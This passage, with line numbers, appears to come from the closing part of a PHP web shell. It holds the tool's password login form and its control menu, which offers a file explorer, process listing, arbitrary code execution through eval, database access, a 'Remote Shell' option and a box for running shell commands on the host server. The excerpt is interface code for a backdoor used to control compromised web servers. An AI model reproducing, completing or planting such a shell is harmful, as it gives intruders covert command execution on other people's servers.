2225 if(z && (ty=='sdir')) z.selectedIndex = 1;
2226 else if(z && (ty=='sfile')) z.selectedIndex = 0;
2227}
2228</script>
2229</head>
2230<body>
2231<table id='main'><tr><td>
2232<?php if($s_auth){?>
2233 <div><span style='float:right;'><a href='<?php echo $s_self; ?>logout'>log out</a></span><table id='header'><tr><td style='width:80px;'><table><tr><td><h1><a href='<?php echo $s_self."cd=".cp(dirname(realpath($_SERVER['SCRIPT_FILENAME']))); ?>'><?php echo $s_name; ?></a></h1></td></tr><tr><td style='text-align:right;'><div class='ver'><?php echo $s_ver; ?></div></td></tr></table></td>
2234 <td><div class='headinfo'><?php echo $s_info; ?></div></td></tr></table>
2235 </div>
2236 <div style='clear:both;'></div>
2237 <div id='menu'>
2238 <table style='width:100%;'><tr>
2239 <td><a href='<?php echo $s_self; ?>' title='Explorer'><div class='menumi'>xpl</div></a></td>
2240 <td><a href='<?php echo $s_self; ?>ps' title='Display process status'><div class='menumi'>ps</div></a></td>
2241 <td><a href='<?php echo $s_self; ?>eval' title='Execute code'><div class='menumi'>eval</div></a></td>
2242 <td><a href='<?php echo $s_self; ?>info' title='Information about server'><div class='menumi'>info</div></a></td>
2243 <td><a href='<?php echo $s_self; ?>db' title='Connect to database'><div class='menumi'>db</div></a></td>
2244 <td><a href='<?php echo $s_self; ?>rs' title='Remote Shell'><div class='menumi'>rs</div></a></td>
2245 <td style='width:100%;padding:0 0 0 6px;'>
2246 <form action='<?php echo $s_self; ?>' method='post'><span class='prompt'><?php echo $s_prompt; ?></span>
2247 <input id='cmd' onclick="clickcmd();" class='inputz' type='text' name='cmd' style='width:70%;' value='<?php
2248if(isset($_REQUEST['cmd'])) echo "";
2249else echo "- shell command -";
2250?>' />
2251 <noscript><input class='inputzbut' type='submit' value='Go !' name='submitcmd' style='width:80px;' /></noscript>
2252 </form>
2253 </td>
2254 </tr>
2255 </table>
2256 </div>
2257 <div id='content' id='box_shell'>
2258 <div id='result'><?php echo $s_result; ?></div>
2259 </div><?php }
2260else{ ?>
2261 <div style='width:100%;text-align:center;'>
2262
2263 <form action='<?php echo $s_self; ?>' method='post'>
2264 <img src='<?php echo $s_self; ?>favicon' style='margin:2px;vertical-align:middle;' />
2265 <?php echo $s_name; ?> <span class='gaya'><?php echo $s_ver; ?></span><input id='login' class='inputz' type='password' name='login' style='width:120px;' value='' />
2266 <input class='inputzbut' type='submit' value='Go !' name='submitlogin' style='width:80px;' />
2267 </form>
2268 </div>
2269
2270<?php } ?>
2271</td></tr></table>
2272<p class='footer'>Jayalah Indonesiaku ©<?php echo @date("Y",time())." ".$s_name; ?></p>
2273</body>
2274</html><?php die(); ?>